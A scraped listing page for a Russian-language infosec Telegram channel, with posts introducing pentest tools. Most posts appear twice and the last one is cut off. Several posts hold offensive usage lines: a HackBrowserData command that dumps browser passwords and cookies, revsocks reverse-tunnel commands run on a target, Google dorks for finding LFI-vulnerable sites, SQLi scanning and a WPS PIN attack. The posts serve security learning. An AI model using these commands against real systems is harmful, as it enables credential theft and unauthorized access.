
Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Николаевский Ванёк

Лачен пише

Реальний Київ | Украина

Реальна Війна

Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Николаевский Ванёк

Лачен пише

Реальний Київ | Украина

Реальна Війна

Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

Codeby
Крупнейшее ИБ сообщество ру-сегмента
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
TGlist rating
0
0
TypePublic
Verification
Not verifiedTrust
Not trustedLocationРосія
LanguageOther
Channel creation dateApr 11, 2016
Added to TGlist
Feb 07, 2025Linked chat

Codeby Chat
2.9K
Records
18.04.202523:59
35.4KSubscribers02.02.202514:39
50Citation index01.04.202514:53
4.2KAverage views per post13.02.202512:19
5.3KAverage views per ad post28.02.202523:59
8.77%ER01.04.202514:53
11.88%ERRGrowth
Subscribers
Citation index
Avg views per post
Avg views per ad post
ER
ERR
26.03.202516:04
Что такое RouterSploit?
Этот инструмент вдохновлен популярным Metasploit Framework, но сосредоточен исключительно на устройствах сетевого уровня.
Основные возможности RouterSploit
1️⃣ Модули для эксплуатации уязвимостей:
RouterSploit включает модули, которые эксплуатируют известные уязвимости в прошивках сетевых устройств. Это позволяет проверить устройства на наличие незащищенных конфигураций или программных ошибок.
2️⃣ Модуль для сканирования
RouterSploit может сканировать сеть и идентифицировать устройства, их модели и версии прошивок.
3️⃣ Брутфорс-атаки:
Поддерживается автоматизированный подбор логинов и паролей для доступа к устройствам через протоколы Telnet, SSH, HTTP и другие.
4️⃣ Модули пост-эксплуатации:
После успешной атаки можно использовать дополнительные возможности, такие как захват данных, изменение конфигурации или запуск вредоносного кода.
5️⃣ Поддержка множества производителей:
Инструмент поддерживает устройства от компаний Cisco, MikroTik, Netgear, D-Link, TP-Link, Huawei, Juniper и многих других.
Архитектура и структура
RouterSploit разделен на несколько категорий модулей:
➡️ Exploit (Эксплуатация уязвимостей):
Модули, которые используют известные уязвимости, такие как обход авторизации, RCE (удаленное выполнение кода) или переполнение буфера.
➡️ Creds (Подбор учетных данных):
Модули для брутфорса учетных данных и проверки слабых паролей.
➡️ Scanners (Сканеры):
Автоматизированные модули для сканирования сетей и поиска уязвимых устройств.
➡️ Payloads (Полезная нагрузка):
Модули для выполнения кода или изменений конфигурации после успешной эксплуатации.
➡️ Generic (Общие модули):
Модули, которые не зависят от производителя или типа устройства.
⬇️ Установка RouterSploit
Инструмент доступен для систем на базе Linux, macOS и Windows.
1️⃣ Клонирование репозитория:
2️⃣ Установка зависимостей:
3️⃣ Запуск RouterSploit:
После запуска пользователь вы попадете в интерактивную оболочку, похожую на Metasploit.
RouterSploit — это открытый фреймворк для тестирования сетевых устройств на наличие уязвимостей. Он написан на Python и предлагает набор инструментов для сканирования, тестирования и эксплуатации уязвимостей. RouterSploit позволяет находить уязвимости как в домашних маршрутизаторах, так и в корпоративных сетевых устройствах, таких как коммутаторы, точки доступа и межсетевые экраны.
Этот инструмент вдохновлен популярным Metasploit Framework, но сосредоточен исключительно на устройствах сетевого уровня.
Основные возможности RouterSploit
1️⃣ Модули для эксплуатации уязвимостей:
RouterSploit включает модули, которые эксплуатируют известные уязвимости в прошивках сетевых устройств. Это позволяет проверить устройства на наличие незащищенных конфигураций или программных ошибок.
2️⃣ Модуль для сканирования
RouterSploit может сканировать сеть и идентифицировать устройства, их модели и версии прошивок.
3️⃣ Брутфорс-атаки:
Поддерживается автоматизированный подбор логинов и паролей для доступа к устройствам через протоколы Telnet, SSH, HTTP и другие.
4️⃣ Модули пост-эксплуатации:
После успешной атаки можно использовать дополнительные возможности, такие как захват данных, изменение конфигурации или запуск вредоносного кода.
5️⃣ Поддержка множества производителей:
Инструмент поддерживает устройства от компаний Cisco, MikroTik, Netgear, D-Link, TP-Link, Huawei, Juniper и многих других.
Архитектура и структура
RouterSploit разделен на несколько категорий модулей:
➡️ Exploit (Эксплуатация уязвимостей):
Модули, которые используют известные уязвимости, такие как обход авторизации, RCE (удаленное выполнение кода) или переполнение буфера.
➡️ Creds (Подбор учетных данных):
Модули для брутфорса учетных данных и проверки слабых паролей.
➡️ Scanners (Сканеры):
Автоматизированные модули для сканирования сетей и поиска уязвимых устройств.
➡️ Payloads (Полезная нагрузка):
Модули для выполнения кода или изменений конфигурации после успешной эксплуатации.
➡️ Generic (Общие модули):
Модули, которые не зависят от производителя или типа устройства.
⬇️ Установка RouterSploit
Инструмент доступен для систем на базе Linux, macOS и Windows.
1️⃣ Клонирование репозитория:
git clone https://github.com/threat9/routersploit.git
2️⃣ Установка зависимостей:
pip install -r requirements.txt
3️⃣ Запуск RouterSploit:
python3 rsf.py
После запуска пользователь вы попадете в интерактивную оболочку, похожую на Metasploit.
09.04.202507:02
💻💻💻 HackBrowserData — инструмент командной строки, написанный на Go, для расшифровки и экспорта паролей, истории, cookie, закладок, кредитных карт, истории загрузок, localStorage и расширений из браузера. Поддерживает самые популярные браузеры на рынке и работает на Windows, macOS и Linux.
😡 Поддерживаемые браузеры
⏺️ Windows: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge, 360 Speed, QQ, Brave, Opera, OperaGX, Vivaldi, Yandex, CocCoc, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly;
⏺️ Linux: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge Dev, Brave, Opera, Vivaldi, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly;
⏺️ MacOS: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge, Brave, Opera, OperaGX, Vivaldi, CocCoc, Yandex, Arc, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly.
💻 Установка
Из исходного кода:
Готовые исполняемые файлы.
🔒 Использование
Автоматическое сканирование браузера на текущем компьютере с выводом результатов расшифровки в формате JSON и сжатием в zip:
Для экспорта данных из пользовательской папки профиля браузера, используется параметр -p. Для указания пути к папке профиля браузера (используйте двойные кавычки для указания пути):
✏️ В некоторых ситуациях Windows Defender или другое антивирусное программное обеспечение может рассматривать этот инструмент как вирус и не позволять его запускать.
😡 Поддерживаемые браузеры
⏺️ Windows: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge, 360 Speed, QQ, Brave, Opera, OperaGX, Vivaldi, Yandex, CocCoc, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly;
⏺️ Linux: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge Dev, Brave, Opera, Vivaldi, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly;
⏺️ MacOS: Google Chrome, Google Chrome Beta, Chromium, Microsoft Edge, Brave, Opera, OperaGX, Vivaldi, CocCoc, Yandex, Arc, Firefox, Firefox Beta, Firefox Dev, Firefox ESR, Firefox Nightly.
💻 Установка
Из исходного кода:
git clone https://github.com/moonD4rk/HackBrowserData
Готовые исполняемые файлы.
🔒 Использование
Автоматическое сканирование браузера на текущем компьютере с выводом результатов расшифровки в формате JSON и сжатием в zip:
.\hack-browser-data.exe -b all -f json --dir results --zip
Для экспорта данных из пользовательской папки профиля браузера, используется параметр -p. Для указания пути к папке профиля браузера (используйте двойные кавычки для указания пути):
.\hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"
✏️ В некоторых ситуациях Windows Defender или другое антивирусное программное обеспечение может рассматривать этот инструмент как вирус и не позволять его запускать.
14.04.202507:06
💭 Above — анализатор сетевой безопасности для поиска уязвимостей в сети. Разработан для специалистов по тестированию на проникновение и инженеров по безопасности. Основан на библиотеке Scapy.
😮 Поддерживает 28 протоколов: MACSec, EAPOL, ARP , CDP, DTP, LLDP, VLAN, S7COMM, OMRON, TACAS+, ModbusTCP, STP, OSPF, EIGRP, BGP, VRRP, HSRP, GLBP, IGMP, LLMNR, NBT-NS, MDNS, DHCP, DHCPv6, ICMPv6, SSDP, MNDP, SNMP.
🐍 Установка
🚨 Характеристики
Инструмент работает в двух режимах:
⏺️Холодный - анализ дампов трафика;
⏺️Горячий - прослушивание необходимого интерфейса с указанным таймером.
В случае обнаружения инструментом протокола, он выводит необходимую информацию, чтобы указать вектор атаки или проблему с безопасностью:
⏺️ Тип атаки, который может быть выполнен по этому протоколу;
⏺️ Инструмент, который можно использовать для запуска атаки;
⏺️ Техническая информация: MAC- и IP-адреса отправителя, идентификаторы групп FHRP, домены OSPF/EIGRP и т. д.
⏺️ Рекомендации по устранению проблем безопасности.
😡 Примеры
Прослушивание интерфейса eth0 с указанием таймера в 120 секунд (для перехвата трафика требуются root-права) и запись перехваченного трафика в above.pcap:
Для остановки отслеживания трафика необходимо нажать CTRL + С.
При наличии записанного трафика можно искать потенциальные проблемы безопасности в нем:
Поиск хостов c помощью пассивного ARP сканирования:
Все найденные хосты будут записаны в above_passive_arp.txt.
Извлечение всех идентификаторов VLAN из эфира или из дампа трафика при условии нахождении на магистральном порту:
Результат работы будет записан в above_discovered_vlan.txt.
😮 Поддерживает 28 протоколов: MACSec, EAPOL, ARP , CDP, DTP, LLDP, VLAN, S7COMM, OMRON, TACAS+, ModbusTCP, STP, OSPF, EIGRP, BGP, VRRP, HSRP, GLBP, IGMP, LLMNR, NBT-NS, MDNS, DHCP, DHCPv6, ICMPv6, SSDP, MNDP, SNMP.
🐍 Установка
sudo apt-get install python3-scapy python3-colorama python3-setuptools
🚨 Характеристики
Инструмент работает в двух режимах:
⏺️Холодный - анализ дампов трафика;
⏺️Горячий - прослушивание необходимого интерфейса с указанным таймером.
В случае обнаружения инструментом протокола, он выводит необходимую информацию, чтобы указать вектор атаки или проблему с безопасностью:
⏺️ Тип атаки, который может быть выполнен по этому протоколу;
⏺️ Инструмент, который можно использовать для запуска атаки;
⏺️ Техническая информация: MAC- и IP-адреса отправителя, идентификаторы групп FHRP, домены OSPF/EIGRP и т. д.
⏺️ Рекомендации по устранению проблем безопасности.
😡 Примеры
Прослушивание интерфейса eth0 с указанием таймера в 120 секунд (для перехвата трафика требуются root-права) и запись перехваченного трафика в above.pcap:
sudo above --interface eth0 --timer 120 --output above.pcap
Для остановки отслеживания трафика необходимо нажать CTRL + С.
При наличии записанного трафика можно искать потенциальные проблемы безопасности в нем:
above --input ospf-md5.cap
Поиск хостов c помощью пассивного ARP сканирования:
sudo above --interface eth0 --passive-arp
Все найденные хосты будут записаны в above_passive_arp.txt.
Извлечение всех идентификаторов VLAN из эфира или из дампа трафика при условии нахождении на магистральном порту:
sudo above --interface eth0 --search-vlan
Результат работы будет записан в above_discovered_vlan.txt.


31.03.202507:02
Wapiti - инструмент для тестирования безопасности веб-приложений
🦌 Wapiti — это инструмент для тестирования безопасности веб-приложений с открытым исходным кодом, написанный на Python. Он помогает выявлять уязвимости, такие как SQL-инъекции, XSS, проблемы с аутентификацией и конфиденциальностью.
🫎 Особенности Wapiti
- Командная строка - Wapiti использует командную строку для настройки и автоматизации тестов.
- Типы атак - проверяет уязвимости, такие как SQL-инъекции, XSS, LFI, RFI и другие.
- Отчеты - генерирует отчеты в форматах HTML, XML, JSON для анализа уязвимостей.
- Аутентификация - поддерживает сайты с аутентификацией, сессиями и куки.
🫎 Установка Wapiti
Для установки Wapiti достаточно выполнить несколько простых команд в терминале. Убедитесь, что у вас установлен Python 3.x, а также установите необходимые зависимости.
🫎 Пример использования Wapiti
После установки Wapiti можно использовать команду для сканирования веб-сайта на наличие уязвимостей. Вот пример простого запуска сканера на URL:
Файл начнет сканирование сайта
🫎 Генерация отчетов
После завершения сканирования можно сгенерировать отчет. Например, для создания отчета в формате HTML используется команда:
Wapiti создаст отчет в формате HTML, который можно просмотреть в браузере.
🦌 Wapiti — это инструмент для тестирования безопасности веб-приложений с открытым исходным кодом, написанный на Python. Он помогает выявлять уязвимости, такие как SQL-инъекции, XSS, проблемы с аутентификацией и конфиденциальностью.
🫎 Особенности Wapiti
- Командная строка - Wapiti использует командную строку для настройки и автоматизации тестов.
- Типы атак - проверяет уязвимости, такие как SQL-инъекции, XSS, LFI, RFI и другие.
- Отчеты - генерирует отчеты в форматах HTML, XML, JSON для анализа уязвимостей.
- Аутентификация - поддерживает сайты с аутентификацией, сессиями и куки.
🫎 Установка Wapiti
Для установки Wapiti достаточно выполнить несколько простых команд в терминале. Убедитесь, что у вас установлен Python 3.x, а также установите необходимые зависимости.
pip install wapiti3
🫎 Пример использования Wapiti
После установки Wapiti можно использовать команду для сканирования веб-сайта на наличие уязвимостей. Вот пример простого запуска сканера на URL:
wapiti http://example.com
Файл начнет сканирование сайта
http://example.com
на уязвимости, проверяя формы, ссылки и параметры URL.🫎 Генерация отчетов
После завершения сканирования можно сгенерировать отчет. Например, для создания отчета в формате HTML используется команда:
wapiti -u http://example.com -o report.html
Wapiti создаст отчет в формате HTML, который можно просмотреть в браузере.


17.04.202507:02
👩🦰 Sara — анализатор конфигурации RouterOS для поиска неправильных настроек безопасности и уязвимостей. Инструмент не использует эксплойты, полезные нагрузки или атаки методом перебора и не изменяет конфигурации RouterOS. Работает только в режиме чтения, не требуя прав администратора и основан на анализе конфигурации. Используется библиотека netmiko для удалённого подключения по SSH к устройствам RouterOS
🐍 Установка
🔒 Проверки безопасности
Sara проверяет: активность протокола SMB, состояние интерфейсов RMI, безопасность Wi-Fi, UPnP, настройку DNS, DDNS, PoE, безопасность RouterBOOT, SOCKS-прокси, пропускную способность сервера (BTest), протоколы обнаружения CDP,LLDP,MNDP, минимальную длину пароля, SSH, отслеживание подключений, RoMON, MAC-сервер Winbox, SNMP, правила NAT, доступ к RMI по сети, версию RouterOS, уязвимости RouterOS, “Keep Password” in Winbox, стандартные имена пользователей, планировщики, статические DNS-записи.
🪄Особенности
🌟Sara анализирует конфигурацию RouterOS, отправляя команды через SSH и интерпретируя результаты;
🌟Для поиска CVE извлекается текущая версия RouterOS и выполняется проверка с помощью встроенного модуля cve_lookup.py, в котором хранится база известных уязвимостей RouterOS. При этом не проверяется, используются ли уязвимости в реальных условиях;
🌟Если на устройстве установлена более старая версия RouterOS, но уязвимые службы были отключены вручную, некоторые предупреждения могут быть ложными.
👩💻 Использование
--ip: указывает IP-адрес устройства, к которому подключается Sара;
--username: имя пользователя SSH, которое будет использоваться для подключения, так как поддерживается только авторизованный доступ;
--password: пароль для аутентификации по SSH;
--port: указывет нестандартный порт SSH для подключения.
🐍 Установка
sudo apt install git python3-colorama python3-netmiko python3-packaging
🔒 Проверки безопасности
Sara проверяет: активность протокола SMB, состояние интерфейсов RMI, безопасность Wi-Fi, UPnP, настройку DNS, DDNS, PoE, безопасность RouterBOOT, SOCKS-прокси, пропускную способность сервера (BTest), протоколы обнаружения CDP,LLDP,MNDP, минимальную длину пароля, SSH, отслеживание подключений, RoMON, MAC-сервер Winbox, SNMP, правила NAT, доступ к RMI по сети, версию RouterOS, уязвимости RouterOS, “Keep Password” in Winbox, стандартные имена пользователей, планировщики, статические DNS-записи.
🪄Особенности
🌟Sara анализирует конфигурацию RouterOS, отправляя команды через SSH и интерпретируя результаты;
🌟Для поиска CVE извлекается текущая версия RouterOS и выполняется проверка с помощью встроенного модуля cve_lookup.py, в котором хранится база известных уязвимостей RouterOS. При этом не проверяется, используются ли уязвимости в реальных условиях;
🌟Если на устройстве установлена более старая версия RouterOS, но уязвимые службы были отключены вручную, некоторые предупреждения могут быть ложными.
👩💻 Использование
--ip: указывает IP-адрес устройства, к которому подключается Sара;
--username: имя пользователя SSH, которое будет использоваться для подключения, так как поддерживается только авторизованный доступ;
--password: пароль для аутентификации по SSH;
--port: указывет нестандартный порт SSH для подключения.
python3 sara.py --ip 192.168.88.1 --username admin --password admin


28.03.202507:04
revsocks
Утилита, написанная на Go, которая реализует обратный SOCKS5 туннель с поддержкой SSL/TLS и прокси (без аутентификации прокси и с базовой/NTLM аутентификацией прокси. Поддерживается на всех ОС, есть поддержка туннелирования DNS, автоматическая генерация сертификата SSL / TLS, если не указано иное.
🚀 Установка:
⚙️ Принцип работы:
⏺️На сервере RevSocks запускается с параметром -listen, указывающим порт, на котором сервер будет принимать соединения от клиента и параметром -socks, задающим адрес SOCKS5-сервера (сервер ожидает входящего соединения от клиента и одновременно предоставляет SOCKS5-интерфейс для внешних подключений).
⏺️На клиенте инструмент запускается с параметром -connect, указывающим на адрес и порт сервера.
⏺️Клиент устанавливает исходящее TCP-соединение к серверу, которое мультиплексируется с помощью Yamux для обработки множества потоков.
⏺️SOCKS5-запросы от сервера передаются через туннель к клиенту, который выполняет их и возвращает данные.
💻 Использование:
Обратное TCP соединение с шифрованием TLS:
DNS туннель:
Утилита, написанная на Go, которая реализует обратный SOCKS5 туннель с поддержкой SSL/TLS и прокси (без аутентификации прокси и с базовой/NTLM аутентификацией прокси. Поддерживается на всех ОС, есть поддержка туннелирования DNS, автоматическая генерация сертификата SSL / TLS, если не указано иное.
🚀 Установка:
# Build for Linux
⚙️ Принцип работы:
⏺️На сервере RevSocks запускается с параметром -listen, указывающим порт, на котором сервер будет принимать соединения от клиента и параметром -socks, задающим адрес SOCKS5-сервера (сервер ожидает входящего соединения от клиента и одновременно предоставляет SOCKS5-интерфейс для внешних подключений).
⏺️На клиенте инструмент запускается с параметром -connect, указывающим на адрес и порт сервера.
⏺️Клиент устанавливает исходящее TCP-соединение к серверу, которое мультиплексируется с помощью Yamux для обработки множества потоков.
⏺️SOCKS5-запросы от сервера передаются через туннель к клиенту, который выполняет их и возвращает данные.
💻 Использование:
Обратное TCP соединение с шифрованием TLS:
# Start on VPS
DNS туннель:
# Start on the DNS server
revsocks -dns example.com -dnslisten :53 -socks 127.0.0.1:1080 -pass
# Start on the target
revsocks -dns example.com -pass


16.04.202515:43
Безопасность сетей: что может BED?
💤 Основные возможности BED:
➡️ Поддержка множества текстовых протоколов, включая HTTP, FTP, SMTP, IMAP, POP3, IRC, SOCKS4/5 и Finger.
➡️ Автоматическое тестирование с отправкой команд с проблемными строками.
➡️ Высокая скорость и легковесность, подходят для систем с ограниченными ресурсами.
➡️ Настраиваемые параметры: IP-адрес, протокол, порт, время ожидания.
💤 Пример использования BED:
Рассмотрим сценарий тестирования HTTP-сервиса на уязвимость переполнения буфера. Если сервер с IP-адресом 192.168.1.100 работает на порту 80, для проверки используйте команду:
Здесь:
➡️
➡️
➡️
BED отправит сформированные запросы на сервер и проанализирует его реакцию. Если найдутся уязвимости, они будут отображены в выводе.
💤 Установка BED:
В большинстве случаев BED предустановлен в Kali Linux. Однако, его можно установить с помощью пакетного менеджера
Первая команда обновляет список пакетов, а вторая устанавливает BED.
🌜 BED (Bruteforce Exploit Detector) — инструмент Kali Linux для поиска уязвимостей в сетевых сервисах с помощью фаззинга, отправляя некорректные данные для выявления ошибок.
💤 Основные возможности BED:
➡️ Поддержка множества текстовых протоколов, включая HTTP, FTP, SMTP, IMAP, POP3, IRC, SOCKS4/5 и Finger.
➡️ Автоматическое тестирование с отправкой команд с проблемными строками.
➡️ Высокая скорость и легковесность, подходят для систем с ограниченными ресурсами.
➡️ Настраиваемые параметры: IP-адрес, протокол, порт, время ожидания.
💤 Пример использования BED:
Рассмотрим сценарий тестирования HTTP-сервиса на уязвимость переполнения буфера. Если сервер с IP-адресом 192.168.1.100 работает на порту 80, для проверки используйте команду:
bed -s HTTP -t 192.168.1.100 -p 80
Здесь:
➡️
-s HTTP
— указывает на протокол HTTP. ➡️
-t 192.168.1.100
— задает IP-адрес сервера. ➡️
-p 80
— указывает порт сервиса.BED отправит сформированные запросы на сервер и проанализирует его реакцию. Если найдутся уязвимости, они будут отображены в выводе.
💤 Установка BED:
В большинстве случаев BED предустановлен в Kali Linux. Однако, его можно установить с помощью пакетного менеджера
apt
. sudo apt update
Первая команда обновляет список пакетов, а вторая устанавливает BED.


21.03.202507:04
Lfi Space
Инструмент, предназначенный для обнаружения уязвимостей Local File Inclusion (LFI) в веб-приложениях. Использует два различных метода сканирования: поиск Google Dork и целевое сканирование URL-адресов.
⏺️Функция поиска Google Dork в LFI Space использует возможности поисковой системы Google для выявления веб-страниц, которые могут быть подвержены атакам LFI.
⏺️Второй подход предоставляет функцию целевого сканирования URL-адресов, которая позволяет вручную вводить список конкретных URL-адресов для сканирования, передавая их в файле.
🐍 Установка:
Для использования вводим команду
🔍 Google Dorks'и для поиска LFI:
Инструмент, предназначенный для обнаружения уязвимостей Local File Inclusion (LFI) в веб-приложениях. Использует два различных метода сканирования: поиск Google Dork и целевое сканирование URL-адресов.
⏺️Функция поиска Google Dork в LFI Space использует возможности поисковой системы Google для выявления веб-страниц, которые могут быть подвержены атакам LFI.
⏺️Второй подход предоставляет функцию целевого сканирования URL-адресов, которая позволяет вручную вводить список конкретных URL-адресов для сканирования, передавая их в файле.
🐍 Установка:
git clone https://github.com/capture0x/Lfi-Space/
Для использования вводим команду
python3 lfi.py
и выбираем один из двух режимов. 🔍 Google Dorks'и для поиска LFI:
inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=


25.03.202516:23
8️⃣ Kubescape: Инструмент для оценки безопасности Kubernetes
Основные возможности Kubescape
1️⃣ Анализ конфигураций Kubernetes
Kubescape сканирует манифесты Kubernetes, такие как Deployment, Service, Pod, ConfigMap и другие. Он ищет ошибки конфигурации, которые могут представлять угрозу безопасности, например:
➡️ Привилегированные контейнеры.
➡️ Отсутствие ограничений на использование ресурсов.
➡️ Открытые внешние сети.
2️⃣ Оценка соответствия стандартам безопасности
Инструмент поддерживает проверку на соответствие популярным стандартам, включая:
➡️ CIS Benchmarks (Center for Internet Security).
➡️ NSA и CISA Kubernetes Hardening Guidelines.
➡️ Собственные политики пользователей.
3️⃣ Интеграция с CI/CD
Kubescape легко интегрируется в конвейеры CI/CD, что позволяет обнаруживать и устранять уязвимости на ранних этапах разработки. Это помогает обеспечить безопасность перед развертыванием приложения в продакшене.
4️⃣ Графический интерфейс и отчетность
Помимо командной строки, Kubescape предоставляет удобный веб-интерфейс, который визуализирует результаты сканирования и облегчает анализ проблем.
5️⃣ Поддержка RBAC (Role-Based Access Control)
Kubescape анализирует роли и привилегии в кластере, определяя избыточные права доступа, которые могут быть использованы злоумышленниками.
🎮 Пример базового использования:
Эта команда сканирует кластер по рекомендациям NSA и исключает namespace kube-system.
⚙️ Примеры использования
➡️ Обнаружение неправильной конфигурации Pod’ов:
Если контейнеры запущены с привилегиями или без указания лимитов ресурсов, Kubescape предупреждает об этих проблемах.
➡️ Инструмент выявляет избыточные роли или нарушения принципа минимальных прав (Least Privilege).
➡️ Аудит соответствия стандартам:
Kubescape помогает поддерживать соответствие отраслевым требованиям, таким как PCI DSS или GDPR, в Kubernetes-кластере.
Kubescape — это мощный инструмент с открытым исходным кодом, предназначенный для анализа безопасности Kubernetes-кластеров. Разработанный с целью упростить выявление уязвимостей и несоответствий конфигурации.
Основные возможности Kubescape
1️⃣ Анализ конфигураций Kubernetes
Kubescape сканирует манифесты Kubernetes, такие как Deployment, Service, Pod, ConfigMap и другие. Он ищет ошибки конфигурации, которые могут представлять угрозу безопасности, например:
➡️ Привилегированные контейнеры.
➡️ Отсутствие ограничений на использование ресурсов.
➡️ Открытые внешние сети.
2️⃣ Оценка соответствия стандартам безопасности
Инструмент поддерживает проверку на соответствие популярным стандартам, включая:
➡️ CIS Benchmarks (Center for Internet Security).
➡️ NSA и CISA Kubernetes Hardening Guidelines.
➡️ Собственные политики пользователей.
3️⃣ Интеграция с CI/CD
Kubescape легко интегрируется в конвейеры CI/CD, что позволяет обнаруживать и устранять уязвимости на ранних этапах разработки. Это помогает обеспечить безопасность перед развертыванием приложения в продакшене.
4️⃣ Графический интерфейс и отчетность
Помимо командной строки, Kubescape предоставляет удобный веб-интерфейс, который визуализирует результаты сканирования и облегчает анализ проблем.
5️⃣ Поддержка RBAC (Role-Based Access Control)
Kubescape анализирует роли и привилегии в кластере, определяя избыточные права доступа, которые могут быть использованы злоумышленниками.
🎮 Пример базового использования:
kubescape scan framework nsa --submit --exclude-namespaces kube-system
Эта команда сканирует кластер по рекомендациям NSA и исключает namespace kube-system.
⚙️ Примеры использования
➡️ Обнаружение неправильной конфигурации Pod’ов:
Если контейнеры запущены с привилегиями или без указания лимитов ресурсов, Kubescape предупреждает об этих проблемах.
➡️ Инструмент выявляет избыточные роли или нарушения принципа минимальных прав (Least Privilege).
➡️ Аудит соответствия стандартам:
Kubescape помогает поддерживать соответствие отраслевым требованиям, таким как PCI DSS или GDPR, в Kubernetes-кластере.


27.03.202515:57
🤔 dnstwist
Инструмент предназначен для анализа предоставленного доменного имени с помощью алгоритмов фаззинга и позволяющий найти похожие домены, которые могут быть использованы в фишинговых атаках.
💻 Последнюю версию можно установить клонировав репозиторий:
😮 Использование:
Обычно генерируются тысячи комбинаций доменов, поэтому целесообразно отображать только те, которые зарегистрированы:
С помощью аргумента --nameservers можно указать внешний DNS-сервер, который будет обрабатывать запросы.
Через аргумент --dictionary передается файл со словарем в случае, если результатов фаззинга не будет хватать.
Для проверки, существуют ли домены с другими TLD, необходимо предоставить файл со списком TLD:
Кроме того, можно указывать необходимые алгоритмы фаззинга перечисляя их:
Для простых перестановок без поиска DNS, используется аргумент --format list.
🚨Обнаружение фишинга:
Ручная проверка каждого доменного имени на предмет того, что оно ведёт на фишинговый сайт, может занять много времени. Для решения этой проблемы, dnstwist использует нечёткие хэши — концепция, которая позволяет сравнивать два входных параметра (HTML-код) и определять базовый уровень сходства и перцептивный хэш — отпечаток, полученный на основе визуальных характеристик изображения (скриншот веб-страницы).
Инструмент предназначен для анализа предоставленного доменного имени с помощью алгоритмов фаззинга и позволяющий найти похожие домены, которые могут быть использованы в фишинговых атаках.
💻 Последнюю версию можно установить клонировав репозиторий:
git clone https://github.com/elceef/dnstwist.git
😮 Использование:
Обычно генерируются тысячи комбинаций доменов, поэтому целесообразно отображать только те, которые зарегистрированы:
dnstwist --registered domain.name
С помощью аргумента --nameservers можно указать внешний DNS-сервер, который будет обрабатывать запросы.
Через аргумент --dictionary передается файл со словарем в случае, если результатов фаззинга не будет хватать.
Для проверки, существуют ли домены с другими TLD, необходимо предоставить файл со списком TLD:
dnstwist --tld dictionaries/common_tlds.dict domain.name
Кроме того, можно указывать необходимые алгоритмы фаззинга перечисляя их:
dnstwist --fuzzers "homoglyph,hyphenation" domain.name
Для простых перестановок без поиска DNS, используется аргумент --format list.
🚨Обнаружение фишинга:
Ручная проверка каждого доменного имени на предмет того, что оно ведёт на фишинговый сайт, может занять много времени. Для решения этой проблемы, dnstwist использует нечёткие хэши — концепция, которая позволяет сравнивать два входных параметра (HTML-код) и определять базовый уровень сходства и перцептивный хэш — отпечаток, полученный на основе визуальных характеристик изображения (скриншот веб-страницы).
dnstwist --lsh domain.name


21.03.202516:33
Logsensor
Инструмент предназначен для обнаружения панелей входа в систему и поиска SQLi в POST запросах. Позволяет быстро просканировать множество URL-адресов засчёт многопроцессорного режима, совместим с http/https прокси.
🔽 Установка:
💻 💻 Использование:
Сканирование нескольких хостов для обнаружения панелей входа в систему. Используя флаг -t, можно передать количество потоков (по умолчанию 30):
Запуск только модуля детектора Login panel:
Поиск SQLi в панели входа для конкретного URL и передача имени пользователя для входа в систему:
Использование прокси-сервера для того, чтобы иметь возможность видеть отправленные запросы:
Инструмент предназначен для обнаружения панелей входа в систему и поиска SQLi в POST запросах. Позволяет быстро просканировать множество URL-адресов засчёт многопроцессорного режима, совместим с http/https прокси.
🔽 Установка:
git clone https://github.com/Mr-Robert0/Logsensor.git
💻 💻 Использование:
Сканирование нескольких хостов для обнаружения панелей входа в систему. Используя флаг -t, можно передать количество потоков (по умолчанию 30):
python3 logsensor.py -f
Запуск только модуля детектора Login panel:
python3 logsensor.py -f
Поиск SQLi в панели входа для конкретного URL и передача имени пользователя для входа в систему:
python logsensor.py -u www.example.com/login --sqli --inputname
Использование прокси-сервера для того, чтобы иметь возможность видеть отправленные запросы:
python logsensor.py -u www.example.com/login --sqli --proxy http:127.0.0.1:8080
10.04.202507:03
Разгадай загадку безопасности с Bully
😈 Первый шаг: Разведка
Прежде чем начать атаку, важно понять, с чем мы работаем. Для этого можно использовать утилиту
Это позволит вам узнать, какой интерфейс будет использоваться для атаки (например,
😈 Второй шаг: Выбор цели
Далее с помощью утилиты
Обратите внимание на столбец
😈 Третий шаг: Настройка Bully
Теперь мы готовы запустить Bully. Для атаки на конкретный BSSID используется следующая команда:
🔥 Пример:
Здесь:
-
-
-
Разбираем загадку атаки
Bully использует уязвимость WPS PIN, перебирая возможные комбинации PIN-кодов. Он автоматически обрабатывает ошибки, такие как тайм-ауты или повторные запросы, что делает его эффективным инструментом для таких атак.
🫠 Bully — это специализированный инструмент для атаки на WPS PIN, который ориентирован на устранение проблем совместимости с маршрутизаторами и повышения надежности проверки. Давайте исследуем его возможности шаг за шагом, как кусочки головоломки.
😈 Первый шаг: Разведка
Прежде чем начать атаку, важно понять, с чем мы работаем. Для этого можно использовать утилиту
iwconfig
для идентификации доступных интерфейсов. Выполните команду:iwconfig
